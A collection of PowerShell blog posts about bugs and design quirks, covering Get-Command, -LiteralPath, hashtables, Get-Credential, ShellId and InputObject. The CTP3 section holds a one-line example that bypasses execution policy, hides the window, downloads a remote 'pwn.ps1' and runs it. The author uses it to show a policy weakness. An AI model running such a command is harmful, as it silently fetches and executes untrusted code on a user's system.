Tag Archives: Bugs

Get-Command in PowerShell 3 (NOTE: CTP2 Bug causes module loading)

I don’t normally blog about the bugs I find in beta software, but I posted this bug to PowerShell’s Connect and I feel like it got ignored and not voted on, so I’m going to try to explain myself better here … The bug is on Connect, but let me talk to you first about how Get-Command is supposed to work.

In PowerShell, Get-Command is a command that serves two purposes: first it lets you search for commands using verb, noun, wildcards, module names etc. and then it also returns metadata about commands. In PowerShell 2, it could only search commands that were in modules (or snapins) you had already imported, or executables & scripts that were in your PATH.

So here’s the deal: Get-Command has always behaved differently when it thinks you’re searching. The only way it can tell that you’re searching is that you don’t provide a full command name. So, if you use a wildcard (e.g.: Get-Command Get-Acl* or even Get-Command Get-Ac[l]), or search using a Noun or Verb (e.g.: Get-Command -Verb Get or Get-Command -Noun Acl or even Get-Command -Verb Get -Noun Acl), then PowerShell assumes you’re searching (and won’t throw an error when no command is found).

In PowerShell 3, because modules can be loaded automatically when you try to run a command from them, Get-Command had to be modified to be able to return commands that aren’t already loaded. The problem the PowerShell team faced is that in order to get the metadata about a command, they needed to actually import the module. What they came up with is that if you’re searching … then Get-Command will not load modules which aren’t already loaded. If you specify a full command name with no wildcards, then PowerShell will load any module(s) where it finds a matching command in order to get the metadata (parameter sets, assembly info, help, etc). And of course, if you specify a full command that doesn’t exist, you’ll get an error!

Perhaps a few examples will help:

Launch PowerShell 3 using:

powershell -noprofile -noexit -command "function prompt {'[$($myinvocation.historyID)]: '}"
 

And then try this, noticing how much more information you get when you specify a specific full name:


[1]: Get-Module
[2]: Import-Module Microsoft.PowerShell.Utility
[3]: Get-Command -Verb Get -Noun Acl | Format-List

Name             : Get-Acl
Capability       : Cmdlet
Definition       : Get-Acl
Path             :
AssemblyInfo     :
DLL              :
HelpFile         :
ParameterSets    : {}
ImplementingType :
Verb             : Get
Noun             : Acl


[4]: Get-Module

ModuleType Name                                ExportedCommands
---------- ----                                ----------------
Manifest   Microsoft.PowerShell.Utility        {Add-Member, ...}

[5]: Get-Command Get-Acl | Format-List

Name             : Get-Acl
Capability       : Cmdlet
Definition       : Get-Acl [[-Path] <string[]>] [-Audit]
                   [-AllCentralAccessPolicies] [-Filter <string>]
                   [-Include <string[]>] [-Exclude <string[]>]
                   [-UseTransaction] [<CommonParameters>]

                   Get-Acl -InputObject <psobject> [-Audit]
                   [-AllCentralAccessPolicies] [-Filter <string>]
                   [-Include <string[]>] [-Exclude <string[]>]
                   [-UseTransaction] [<CommonParameters>]

                   Get-Acl [[-LiteralPath] <string[]>] [-Audit]
                   [-AllCentralAccessPolicies] [-Filter <string>]
                   [-Include <string[]>] [-Exclude <string[]>]
                   [-UseTransaction] [<CommonParameters>]
Path             :
AssemblyInfo     :
DLL              : C:\Windows\Microsoft.Net\assembly\GAC_MSIL\
                   Microsoft.PowerShell.Security\
                   v4.0_3.0.0.0__31bf3856ad364e35\
                   Microsoft.PowerShell.Security.dll
HelpFile         : Microsoft.PowerShell.Security.dll-Help.xml
ParameterSets    : {[[-Path] <string[]>] [-Audit]
                   [-AllCentralAccessPolicies] [-Filter <string>]
                   [-Include <string[]>] [-Exclude <string[]>]
                   [-UseTransaction] [<CommonParameters>],
                   -InputObject <psobject> [-Audit]
                   [-AllCentralAccessPolicies] [-Filter <string>]
                   [-Include <string[]>] [-Exclude <string[]>]
                   [-UseTransaction] [<CommonParameters>],
                   [[-LiteralPath] <string[]>] [-Audit]
                   [-AllCentralAccessPolicies] [-Filter <string>]
                   [-Include <string[]>] [-Exclude <string[]>]
                   [-UseTransaction] [<CommonParameters>]}
ImplementingType : Microsoft.PowerShell.Commands.GetAclCommand
Verb             : Get
Noun             : Acl


[6]: Get-Module

ModuleType Name                                ExportedCommands
---------- ----                                ----------------
Manifest   Microsoft.PowerShell.Security       {ConvertFrom-Sec...}
Manifest   Microsoft.PowerShell.Utility        {Add-Member, ...}
 

But there are several problems:

Get-Command has another parameter: -Module, which allows you to specify which modules should be searched, and in PowerShell 3, it changes the behavior in weird (buggy) ways:

  1. If you specify a single module, then that module is imported (to search it more thoroughly?), even if you specify a specific command that’s not in that module.
  2. If you specify a single module that does not have a command that matches, then Microsoft.PowerShell.Management is loaded also. I don’t know why yet.
  3. If you specify more than one module, and you’re searching, and none of them have a command that matches … it’s just as though you hadn’t specified modules, and nothing unexpected happens.
  4. If you specify more than one module, and a specific command, then it gets really weird:
    • If the command is in one (or more) of the specified modules, the first listed module (in PATH order, not the order you specified) that has the command is imported.
    • If it’s a valid command in a different module, the first module with the command is loaded … and so is Microsoft.PowerShell.Management. I don’t know why! Oh, and you still get the error because it can’t find the command where you told it to look.

I filed a bug on Connect to cover that last scenario, where the module containing the command is loaded even though you gave Get-Command a list of modules to look in. Here’s another example; notice that even though all I do is run the same command over and over (I added some Get-Module calls to show you WHY you get these results, but it’s the same without them), I get different results:


[1]: Import-Module Microsoft.PowerShell.Utility
[2]: Get-Module

ModuleType Name                                ExportedCommands
---------- ----                                ----------------
Manifest   Microsoft.PowerShell.Utility        {Add-Member, ...}


[3]: Get-Command Get-Acl -module (Get-Module) # Passes one module
Get-Command : The term 'get-acl' is not recognized as the name of a
cmdlet, function, script file, or operable program. Check the
spelling of the name, or if a path was included, verify that the
path is correct and try again.

[4]: Get-Module

ModuleType Name                                ExportedCommands
---------- ----                                ----------------
Manifest   Microsoft.PowerShell.Management     {Add-Computer, ...}
Manifest   Microsoft.PowerShell.Utility        {Add-Member, ...}


[5]: Get-Command Get-Acl -module (Get-Module) # Passes two modules
Get-Command : The term 'get-acl' is not recognized as the name of a
cmdlet, function, script file, or operable program. Check the
spelling of the name, or if a path was included, verify that the
path is correct and try again.

[6]: Get-Module

ModuleType Name                                ExportedCommands
---------- ----                                ----------------
Manifest   Microsoft.PowerShell.Management     {Add-Computer, ...}
Manifest   Microsoft.PowerShell.Security       {ConvertFrom-Sec...}
Manifest   Microsoft.PowerShell.Utility        {Add-Member, ...}

[7]: # This time it will include Microsoft.PowerShell.Security!
[7]: Get-Command Get-Acl -module (Get-Module)

Capability      Name                ModuleName
----------      ----                ----------
Cmdlet          Get-Acl             Microsoft.PowerShell.Security
 

Visual Studio Not Responding (beeping) when editing ASPX

I’m just going to share the solution, in case anyone else encounters this after installing Office 2007 or 2010.

Yesterday I came across a very strange bug which was causing Visual Studio to lock up after a few (30?) seconds every time I opened an ASPX file for editing. I even uninstalled a few VS addons I thought might have caused it… but that didn’t help (I’m reinstalling Resharper as I type this).

After much frustration and a couple of Bing searches … it turned out to be a problem with MS Office 2007 components. This was a bit of a surprise, since I do not have Office 2007 installed. However, I do have Office Communicator and Live Meeting which are Office 2007 products — and I had just installed Office 2010, which may have actually caused the problem.

Rinat Abdullin wrote about the problem earlier and there’s a thread on StackOverflow which is at least related.

Basically: you get “beeping” when you try to click in the text editor for aspx, or on the Solution Explorer … (sometimes, but not always, Visual Studio will actually be marked as “Not Responding” by Windows) and when this happens, if you look in your TaskManager you’ll see this Setup.exe process.

This one — in your %CommonProgramFiles% or %CommonProgramFiles(x86)%:
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE12\Office Setup Controller\SETUP.EXE

Shutting down Visual Studio and then running that installer “as administrator” manually has solved the problem for me. I just hit “Repair” and that was that. Others (including Rinat) have said they had to reinstall Office — I suspect that probably depends on whether or not you had Office 2007 installed in the first place.


Rage Against the Design

So we found a problem recently with a certain scripting language’s argument parsing:


function Test-Argument($a) {
   $a.GetType().FullName
}

[Test 1]: Test-Argument 4
System.Int32
[Test 2]: Test-Argument .5
System.Double
[Test 3]: Test-Argument "hello"
System.String
[Test 4]: Test-Argument Goodbye
System.String
[Test 5]: Test-Argument -42
System.String
[Test 6]: Test-Argument (-42)
System.Int32
 

Why can’t it properly parse -42 as an integer, when it can parse .5 as a double? Well, according to the development team of a certain Fortune 100 company, this behavior is by-design ... Apparently, “.” can be a number, but “-” can’t.

When you know you’ve got it all wrong, but you can’t be bothered to get it right, document it — make it look intentional, and most people won’t question you.

I’m sorry folks, but I’ve had it up to here with the “it’s by design” excuse. I don’t care who you are, and I don’t care who wrote the design spec — when something is as obviously wrong as this, you need to fix it, not just give us platitudes.

I had the same thing happen recently with a bug I filed about the way wildcard behavior impedes matching file-names with square brackets in them in PowerShell. They told me this was by design, and that I could use the -LiteralPath parameter. Well, if any of you have tried this, you already know what I’m going to say: it’s broken.
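
For context, here’s a minimal sketch of the original wildcard problem (the file name is made up): square brackets in a -Path are treated as a wildcard character class, so the literal name never matches.


## Suppose a file literally named "logs [www.example.com].txt" exists:
Get-ChildItem -Path "logs [www.example.com].txt"         # finds nothing: [...] is a wildcard set
Get-ChildItem -LiteralPath "logs [www.example.com].txt"  # finds the file


But watch what happens when you take their advice and use -LiteralPath to create a file that doesn’t exist yet: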


## This works if the file already exists
## But fails completely if it doesn't exist
set-content -LiteralPath "logs [www.example.com].txt" -Value " help "
 

And yet, I was initially told it was supposed to be this way. Now, in this case, I happened to have the email address of the software architect, and they’ve reopened my bug after I sent him an email with lots of examples of how this bug defied the behavior that a user expects.

We software developers need to be very careful about saying “that’s by design” ... because it sometimes makes us sound stupid. When a user says “this is broken,” and your reply is “that’s by design,” what the user hears is “we broke it on purpose.” We should not be willing to excuse bad design.

Listen up: If you want to be a successful software developer, you need to learn this, and learn it well: the fact that it was DESIGNED WRONG is NOT AN EXCUSE for shipping broken software. Regardless of whether it’s your design, or someone else’s, even if it was designed this way by your manager’s boss. When you create software that doesn’t behave the way the user expects it to, you need to consider the possibility that you’re doing it wrong.

Imagine if architectural engineers were to behave in a similar manner … Suppose the original architect of the Golden Gate Bridge had left a gap in the middle of the bridge, with a little ramp: you could drive up the bridge, but you couldn’t get across unless you were comfortable jumping your car across a four foot opening.

When you complained about it, the engineers would say: it’s by design — if you don’t like jumping your car (and yes, we know that jumping is bad for maintainability), there is a workaround: just wait for the ferry we put in last year. There are several boats, running continuously, so the wait is at maximum about 20 minutes, and it only takes a little longer to cross by boat than it would on the bridge.

That analogy is obviously not perfect, but the point is: just because someone decided it should be done a certain way doesn’t mean that’s the right thing to do — sometimes the design is just wrong. Perhaps the designer and architects overlooked something, or perhaps the circumstances have changed, but in any case, if the software doesn’t work the way people expect it to work, or requires different workarounds depending on the situation … you need to question the design.

All I’m asking is this: don’t turn your brain off: when someone complains about the way something works (or doesn’t work), think about what they’re asking, and if the complaint makes sense, don’t say “this misbehavior is by design” until you’ve reconsidered the design.

PowerShell 2 CTP3 – First Impressions

Changes of particular interest

Get-Command returns functions

By default Get-Command used to return only apps, scripts in your path, and cmdlets… The new CTP3 default invocation includes functions. This is mostly a recognition of the increased power of functions with the arrival of the advanced function features (formerly known as script cmdlets).
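
For example (a quick sketch):


Get-Command                          # the CTP3 default now includes functions
Get-Command -CommandType Function    # or narrow the list to just functions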

Advanced Functions

Advanced Functions is the new name for what was called “Script Cmdlets” in CTP2. Instead of adding a CMDLET keyword to the language, we now have a [CmdletBinding()] attribute which can be specified in your functions —just before the PARAM block— which will enable all of the features which were exclusive to CMDLETs in CTP2. NOTE: Unlike in C#, the parentheses in [CmdletBinding()] are REQUIRED to differentiate it from PowerShell’s type notation.
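
Here’s a minimal sketch of the shape (the function and parameter names are mine):


function Get-Widget {
   [CmdletBinding()]
   param(
      [Parameter(Mandatory=$true, ValueFromPipeline=$true)]
      [string]$Name
   )
   process {
      Write-Verbose "Looking up $Name"   # -Verbose and -Debug now behave like they do for compiled cmdlets
      "Widget: $Name"
   }
}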

I will write an entire article about Advanced Functions soon, because there is a lot to write about, and after struggling with them for several hours today, it’s clear that the about * documentation for them is mostly wrong and misleading. The PowerShell team blog post about Advanced Functions has some working examples, so start there and with the release notes (none of the about_functions_advanced samples will run — I wrote a bug about this, please vote for it if you agree).

Functions have help!

This is, without a doubt, my favorite feature so far. You can embed help for functions in comments inside the function block, and Get-Help will find and parse it. Not only that, but your functions get automatic implementation of the -? parameter, bringing script functions closer to equality with compiled cmdlets, in terms of user experience.
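
A quick sketch of what that looks like (the function and help text are made up):


function Get-Widget {
   # .Synopsis
   #   Gets a widget by name.
   # .Parameter Name
   #   The name of the widget to retrieve.
   # .Example
   #   Get-Widget -Name Sprocket
   param([string]$Name)
   "Widget: $Name"
}

Get-Help Get-Widget -Full   # parses the help out of the comments
Get-Widget -?               # and -? comes along for free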

Cmdlet name collisions

You can now have two snapins or modules loaded which export the same cmdlets (or different ones with the same name). PowerShell resolves to the last one loaded by default. You can run previously loaded ones that have been hidden by specifying the full namespace\cmdlet path.
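
For example (the module and command names here are hypothetical):


## If ModuleA and ModuleB both export Get-Widget, the one loaded last wins:
Get-Widget                               # runs ModuleB\Get-Widget
ModuleA\Get-Widget                       # the module-qualified name reaches the hidden one
Microsoft.PowerShell.Utility\Get-Date    # the same syntax works for the built-in modules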

Modules

There has been a complete refactoring of the module system such that the environment variable and default Module folders have been renamed, and the cmdlets as well (Add-Module becomes Import-Module and New-Module). The “Module Metadata” support has been finished, so you can create .psd1 metadata files which wrap modules and expose additional features. Thanks to the data in those Metadata files, Get-Module now returns much more information about modules, including the author’s name, copyright info, etc. This is another area where I’ll have a whole article about the new functionality up soon, as an update to my former article about modules.
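
Here’s a rough sketch of what one of those .psd1 manifests looks like (the values are made up, and the key names are the ones I remember, so double-check them against the release notes):


@{
   ModuleToProcess   = 'MyModule.psm1'
   ModuleVersion     = '1.0.0.0'
   Author            = 'Your Name'
   Copyright         = '(c) 2009'
   Description       = 'An example module wrapped by a manifest'
   FunctionsToExport = '*'
}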

Lots of other things ;)

It’s not my intention to rewrite the release notes here… I just wanted to call attention to some of the stuff that’s most interesting to me. You should definitely read the release notes.

Other improvements

Eventing

In a sense, we had PSEvents in CTP2. But in this release they’ve been beefed up, renamed a little, and have become a very useful way for cmdlet authors to expose functionality (you can create your own system-level events which users can write scripts to handle and target).
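
Here’s a rough sketch of the kind of thing eventing enables, using a FileSystemWatcher (the cmdlet names are as I understand them; check the release notes for the exact set):


$watcher = New-Object IO.FileSystemWatcher "$pwd", "*.log"
Register-ObjectEvent -InputObject $watcher -EventName Created -SourceIdentifier LogCreated -Action {
   Write-Host "New log file: $($eventArgs.FullPath)"
}
$watcher.EnableRaisingEvents = $true
## ... and later, to clean up:
Unregister-Event -SourceIdentifier LogCreated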

Exception Handling

I’m not really sure this counts as improved over CTP2, but a lot of people seem to be unaware that PowerShell v2 now supports the C#-like try{ ... } catch { ... } finally { ... } block, and allows you to specify multiple exceptions to be trapped by a single catch statement (I wish C# would implement that).
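
A small sketch of the syntax (the file path is made up):


try {
   Get-Content "C:\does\not\exist.txt" -ErrorAction Stop
} catch [System.Management.Automation.ItemNotFoundException], [System.IO.FileNotFoundException] {
   Write-Warning "Couldn't find the file: $($_.Exception.Message)"
} catch {
   Write-Warning "Something else went wrong: $_"
} finally {
   Write-Host "Done, either way."
}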

Command-line Parameters

There are two new parameters to PowerShell:

-WindowStyle

This lets you execute PowerShell “Hidden” or at least “Minimized” so that your startup or scheduled tasks don’t need to pop up windows that interrupt the user! Hurray! In fact, not only can you launch PowerShell hidden, you can hide the running host window by just running a PowerShell instance in it (it stays hidden even after PowerShell exits — that might be considered a bug, but I’m not really sure what I think of it). This would be most useful if you were trying to do GUI stuff in your scripts, but I’m sure you can think of other uses… here’s an example (IAA= is just a space, encoded).


powershell -win hidden -nop -enc IAA=
## any output here won't be seen ...
[Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms")
[Windows.Forms.MessageBox]::Show("Hello from PowerShell",$pid)
write-host "Hello" -back Green;
Clear-Host
## but this output will be, once the window returns...
write-host "And now back to your regularly scheduled program..." -fore Green;
powershell -win normal -nop -enc IAA=
 

It even works in DOS:


powershell -win hidden -nop -enc IAA=
; any output here won't be seen ...
echo "Hello World!"
cls
; and this will be...
dir /w
powershell -win normal -nop -enc IAA=

-ExecutionPolicy

You can override the ExecutionPolicy on the command line. This is very interesting (and rather worrying). It’s my opinion that this option completely breaks the Execution Policy system because you don’t have to be elevated/administrator to use the flag.

What I’m trying to say is that in a business environment, where users are not administrators on their own systems, this flag seems to allow users to ignore the administrator’s script execution policy, and even modify their default shortcuts to just start with whatever setting they prefer. Currently (in v1 and v2) the Set-ExecutionPolicy cmdlet requires administrative rights (and an elevated console, on Vista), but this commandline argument means that anyone can just run PowerShell -EP Unrestricted to get around that.

This seems to render the setting a lot less useful, since it only applies if the user doesn’t know they can override it, or if the setting is unrestricted enough that the user doesn’t feel constrained by it. My guess is that the ExecutionPolicy parameter should either disappear, or be constrained to making the policy more restrictive than the default. Here’s my scary batch/vbs script:


powershell -ex unrestricted -win hidden -com {imo FileTransfer; new-filetransfer http://jaykul.com/pwn.ps1 $Env:Temp\pwn.ps1; & $Env:Temp\pwn.ps1}

If you have an opinion, vote here

Possible bugs?

[char] comparisons are supposed to be alphabetical

Formerly, comparisons of objects of type [char] (characters) were done as integers (against the unicode character value), but in CTP3 characters are supposed to behave as text, basically the same way strings do when it comes to case-insensitive comparison (except that, to keep them compatible, you must specify -IEQ to compare insensitive). This works fine in a case like: ([char]'a') -ieq 'A' but inexplicably fails for ([char]'a') -ieq ([char]'A') … which leads me to believe the team has simply hard-coded an exception for the CHAR-to-STRING comparison, and missed CHAR-to-CHAR. I wrote that up too, and hope you’ll take the time to agree or disagree (a couple of people in IRC mentioned that after this strangeness they just want it back the way it was).
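
To make the repro copy-and-paste-able, here’s what I’m seeing:


([char]'a') -ieq 'A'            # True:  char vs. string compares as text
([char]'a') -ieq ([char]'A')    # False: char vs. char still compares the character values
[int][char]'a'                  # 97
[int][char]'A'                  # 65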

I’m sure I’ll have more to write here tomorrow …

PowerShell and Hashtable oddities

Hashtables are IEnumerable, but they don’t behave that way in PowerShell … this seems to cause all sorts of odd behavior and such, so I thought I’d write up all the examples I can think of in one place. That means this post is going to be a little bit rambling, so please bear with me.

PowerShell enumerates IEnumerable


add-type @"
using System.Collections;
public class enumer : IEnumerable {
  public IEnumerator GetEnumerator() {
    for(int i = 0; i < 10; i++) {
      yield return i;
    }
  }
}
"@

$e = new-object enumer
$e -is [Collections.IEnumerable]      # is true
$e                                    # will output 0..9 to the console
$e.GetEnumerator()                    # will output the same
$e | measure-object                   # will show a count of 10.

$table = @{test="This is a test";exam="this is an exam";defense="defend your thesis"}

$table -is [Collections.IEnumerable]  # is true too!

$table                                # will output three DictionaryEntry items
$table.GetEnumerator()                # will output the same thing
$table.Count                          # will output 3
$table | measure-object               # will output 1! WHAT!?
 

It turns out that in the case of Hashtables, PowerShell does NOT enumerate them into the pipeline. Instead, it passes the entire Hashtable object. Of course, nobody realizes this … because the output cmdlets unwrap them (what?!).

But there are bugs caused by special treatment

The first bug is in Add-Member, which doesn’t work on Hashtables until you’ve already used the Hashtable.


$table = @{test="This is a test";exam="this is an exam";defense="defend your thesis"}
Add-Member -in $table NoteProperty Quiz "Surprise, hope you're ready!"
$table.Quiz  # It's not there! There is NO OUTPUT
Add-Member -in $table NoteProperty Quiz "Surprise, hope you're ready!"
$table.Quiz  # This time it works ...
 

NOT ONLY does Add-Member not work the first time, it’s not just a matter of calling it twice: you have to actually try to access something in the hashtable before you can use Add-Member on it:


$table = @{test="This is a test";exam="this is an exam";defense="defend your thesis"}
Add-Member -in $table NoteProperty Puzzle "How on earth does this work?"
Add-Member -in $table NoteProperty Quiz   "Surprise, hope you're ready!"
$table.Quiz  # It's not there! There is NO OUTPUT
Add-Member -in $table NoteProperty Quiz   "Surprise, hope you're ready!"
Add-Member -in $table NoteProperty Puzzle "How on earth does this work?"
$table | gm -type NoteProperty | %{ $_.Name }  # Output: Puzzle, Quiz
 

Here’s another buggy manifestation, in the Formatting cmdlets. This time, the Format-* cmdlets unroll the hashtable … to make it look like it’s being enumerated the way it should be.


$table = @{test="This is a test";exam="this is an exam";defense="defend your thesis"}
## Prime it so that Add-Member will work
$table.PrimeTheHashtableSoWeCanAddMember
Add-Member -in $table NoteProperty Quiz   "Surprise, hope you're ready!"

## Note how Measure-Object and Get-Member operate on the HASHTABLE
## There's only a single item, of course...
$table | measure-object | %{$_.Count}  
## And we have 7 Properties, plus the Quiz NoteProperty
$table | get-member -type Properties | %{ $_.Name }

## But Format-List shows the properties of the ITEMS
## So we think we can list those properties like:
$table | format-list *
 

Clearly, the Format-* cmdlets have magic code that unwraps hashtables. Which just leads to even more confusion: $table looks the same (in the console output) as $table.GetEnumerator() ... but it doesn’t behave the same way, EXCEPT to the format cmdlets.

PowerShell 2.0 uses Hashtables more

In PowerShell 2.0, the PowerShell team is adding another special feature based on hashtables (which appears at first to be based on IEnumerables):

Jeffrey Snover gave an example of splatting in his PDC presentation. Splatting is where a collection is unwrapped so that you can take an array of values and pass one to each parameter of a cmdlet or function. But in Jeffrey Snover’s demo, he splatted a hashtable. Basically, the hashtable keys are matched up to parameter names as though they had been specified by name. That made me wonder why splatting can’t work with custom objects, but after investigating a bit, I’m actually frustrated with the inconsistency of how hashtables are treated in Posh.

  • In the splatting scenario they are unrolled as a collection of named parameters …
  • If you pipe them, they’re treated as a single object instead of being unrolled …
  • Even though you can access hashtable items using dotted property syntax, you can’t use them to set ValueFromPipelineByPropertyName values, because they aren’t really properties.

The new splatting feature seems to only work with simple arrays and hashtables … adding yet another scenario where the hashtable is being treated specially (even though it doesn’t need to be: if they just splatted IEnumerable, we could work with List, and any IEnumerable of DictionaryEntry objects or KeyValuePair could be matched by name … that would make hashtables work, but it would also let you use the more powerful generic collections, etc.).
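
To make the hashtable-splatting scenario concrete, here’s a minimal sketch (the function and parameter names are mine):


function Test-Splatting {
   param($Path, $Value)
   "Path = $Path; Value = $Value"
}

$settings = @{ Path = "logs.txt"; Value = "hello" }
Test-Splatting @settings    # the keys are bound to the matching parameter names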

You know what would be cool? If I could splat any object (like a custom PSObject that I have added members to), and have its property names matched to parameter names as though all the parameters had ValueFromPipelineByPropertyName set.

You know what would be really cool? If I could specify that I want pipeline objects splatted, forcing ALL parameters to be treated as ValueFromPipelineByPropertyName, without needing to use: ForEach-Object { Test-Splatting @_ } … maybe a syntax like: Get-HashTablesToSplat | Test-Splatting @@ …

A Better Get-Credential in one line of code

For too long I have ignored the deficiencies in Get-Credential, so now I am going to fix them. Ready?


function Get-Credential($caption,$msg,$domain,$name){$Host.UI.PromptForCredential($caption,$msg,$name,$domain)}

Ok, that’s better than the default, whew! ;) At least you can specify the prompt text and the domain and default user name … but there are so many other options that are missing from that dialog —like remembering my credentials for goodness sakes. I know many places forbid using the “remember” option for credentials, but why is that decision not up to me?
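
Usage looks like this (the caption, message, and account are obviously made up):


$cred = Get-Credential "Connect" "Enter your lab credentials" "EXAMPLE" "jdoe"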

Well, I can’t make all of those options appear (at least, not without compiling a pinvoke function to call the Win32 API) nor can I force PowerShell to use the new Vista/2008 Credential function (which is Common Criteria compliant in Vista) instead of the older CredUIPromptForCredentials ... but I can give you the most requested feature for Get-Credential: a -Console option to force the prompt to happen in the console instead of in a “CredUI” pop up.

[new] Note: I kind-of messed up here, this will break if you’re used to using the -Credential parameter for Get-Credential to provide a default user name. I’ll fix it shortly.

Is PowerShell $ShellId too big a burden?

As you may know, I was one of the first developers who jumped on board and started working on an alternative PowerShell host (actually, I’m also the first to create a WPF-based host, and the first to create one that was open source … but enough about me).

Recently I’ve picked back up on that project, and am just about ready to release what I hope will be the last “pre-release” of PoshConsole before I declare it to be “beta” quality and start doing more regular releases. ;-)

[Image: Trivial example of inline WPF output]

The coolest features of PoshConsole, the ones that are really revolutionary, involve exposing the WPF surface to scripts and cmdlets so that you can actually have graphical output in the console — not popups, and not just for fun… but stuff like putting bar graphs behind the size columns in Get-ChildItem for folders, and the memory columns in Get-Process, etc… anyway.

So I’ve been writing a few scripts to show off the possibilities of PoshConsole, and was thinking about even posting them on the PoshCode.org PowerShell Script Repository, but I wanted a way to make clear that they’d only work in PoshConsole.

A little investigation later, and it was clear that PowerShell has a built in feature for this: #requires -ShellId PoshConsole … except, it doesn’t work. Actually, it doesn’t work for two reasons:

  1. PowerShell always ignores #requires -ShellId Anything
  2. No other PowerShell host implements ShellId as far as I can see

The ShellId is a read-only property of the RunspaceConfiguration, so to implement it in your PowerShell host you have to create your own RunspaceConfiguration class inheriting from the abstract base class. The problem is, there are some expensive side-effects:

  1. You have to configure the available .net Assemblies, Cmdlets, Format files, Initialization Scripts, Providers, Scripts, and Type files …
  2. Having your own ShellId means you don’t inherit anything from PowerShell.exe (like for instance, the ExecutionPolicy)
  3. Some cmdlets just don’t seem to work (Add-PSSnapin is just failing on me with “Object reference not set to an instance of an object”)

So … to sum up: PowerShell ignores #requires -ShellId, and I can’t find another host (including Microsoft’s “Graphical PowerShell” and the latest and greatest PowerShell Plus Professional) that bothers to set the ShellId. Can anyone tell me a reason why I should bother with this?

Oh, and, can anyone give me some information about why Add-PSSnapin might be failing when I do set the ShellId?

[new] ShellId IS too big a burden.

After further investigation, it turns out that the reason Add-PSSnapin fails is because it uses a method AddPsSnapIn which is part of the RunspaceConfiguration (that you had to create yourself to set the ShellId), and you can’t implement that method (in fact, you can’t seem to override it with “new” either, I’ll have to look into that a little more).

In any case, the method has to return a PSSnapInInfo object, and since there are no public constructors for PSSnapinInfo objects, you’re sore-out-of-luck. It appears you would literally have to reverse engineer the whole “PSSnapin” system and create your own cmdlets and functionality around it to try to keep your host compatible with the main PowerShell. No wonder nobody’s done this…

I guess I’ll just go back to using Microsoft.PowerShell as my ShellId, I don’t know what I was thinking.

What’s the desired behavior of inputObject?

In response to Kirk Munro’s comment on my Writing Cmdlets for the PowerShell Pipeline post:

You know, I’ve looked at your articles about cmdlets/functions in the pipeline and I feel you’re missing something. The purpose of the InputObject parameter is to pass in a collection as a single object. This is as opposed to using the pipeline where a collection is passed along the pipeline one item at a time. There are cases where you want to pass in a collection as a collection.

Quite simply, I disagree. The documentation for these parameters says quite clearly that inputObject “Specifies an object or objects to input to the cmdlet.” This clearly means that I should be able to pass multiple objects, and have them treated as multiple objects, not as a single array object.

If you look at your example (Select -First 3 -Unique -InputObject $a), this does in fact work. It receives one object, an array. It then selects the first 3 objects, but there is only 1 so that is moot. And lastly it selects unique objects, but again there is only 1 so that is moot as well and finally the object is output using the default formatter. In this case the default formatter is showing the contents of the array.

In this example, Select-Object has no reason to take a single object as an input object, at all. The only time that it would be useful for Select-Object to take a single inputObject would be in combination with the property parameters. In fact, if you want to Select-Object from an array to get the first or last n objects, or to get a set of unique objects, you have to pass the objects in via the pipeline — there’s no other way to make it select from an array. If that was indeed the intent, it should have been written as a separate ParameterSet, and the documentation should be changed to reflect that only a single object can be passed in, and that you can’t use the inputObject parameter with the first, last, or unique parameters at all. That’s worse than useless, it’s misleading and confusing.

Kirk is absolutely right that if you assume that the InputObject argument is only allowed to take a single object, then the behavior is correct – but it’s not logical. In fact, the behavior you see in the output of this command is so useless as to be a bug – even if the documentation did not say the parameter accepts multiple objects as input:


Select-Object -input 4,5,6,4,8 -first 2 -unique
4
5
6
4
8

I know that that’s the way the built-in cmdlets work.

But quite frankly, just because someone important wrote something useless is no reason to emulate the behavior. The InputObject parameter IS the same parameter which pipeline objects go into. There’s no logical explanation for getting different results when we pass an array in via the parameter by name instead of via the pipeline: the PowerShell pipeline passes the things in the pipeline into the -InputObject parameter … it’s not using some mystical variable like it does in script functions.
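
To put the contrast side by side (a quick sketch):


4,5,6,4,8 | Select-Object -First 2 -Unique                 # items flow in one at a time: 4, 5
Select-Object -InputObject (4,5,6,4,8) -First 2 -Unique    # one object: the whole array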

Of course, we all know the powershell pipeline unwraps arrays — that’s convenient, and we can work around it when we really want to pass an array in:


PS> @([int[]]@(1,2,3,4)) | % { "Hi: $_" } # typecast and wrapped isn’t enough...
Hi: 1
Hi: 2
Hi: 3
Hi: 4

PS> @(,[int[]]@(1,2,3,4)) | % { "Hi: $_" } # put it as a member of another array
Hi: 1 2 3 4

PS> @(,@(,[int[]]@(1,2,3,4))) | % { "Hi: $_" }  # go too deep and “stuff” happens.
Hi: System.Int32[]

My point in all of this is that InputObject is actually a very useful parameter, because there are cases where you really want to pass a collection as a collection into a cmdlet and then do something with it. By making InputObject instead split the collection passed in and pipeline it through, you’re forcing users to wrap collections in an array just to get them passed in as a collection, and personally I don’t feel they should have to do that.

While it’s true that passing in an array is sometimes desirable, that’s not the reason the parameter exists, and I don’t believe it should be the default behavior here. It should be just as easy for me to use the cmdlet with the inputObject parameter directly as it is to input them via the pipeline. If I put in unwrapping for the inputObject parameter, you can work around it in the same way I did in the examples above. Incidentally, I think *PowerShell* should unwrap arrays to ValueFromPipeline parameters regardless of whether they’re on the pipeline, but I recognize it’s probably too late for that.

Basically, this is my argument: If inputObject unwraps arrays, the syntax for passing an array by wrapping it in @(,$array) is simple, for those rare occasions when that’s actually what you want. But if it does not unwrap arrays, you’re forced to call it via a separate pipeline, because unwrapping the array and passing it in one at a time in a foreach loop will almost certainly not do the same thing, and this is much uglier — and not compatible with use within the pipeline, particularly if you need to pass the pipeline output into a different parameter.

I guess my final word would be to agree with Kirk that “InputObject … isn’t documented clearly enough” … in fact, it’s clearly behaving incorrectly according to the documentation, and that’s why I originally proposed to unwrap the inputObject parameter when it’s passed as a parameter: to make it work the way the documentation suggests it would, which seems to me to be a better way than the way it actually works.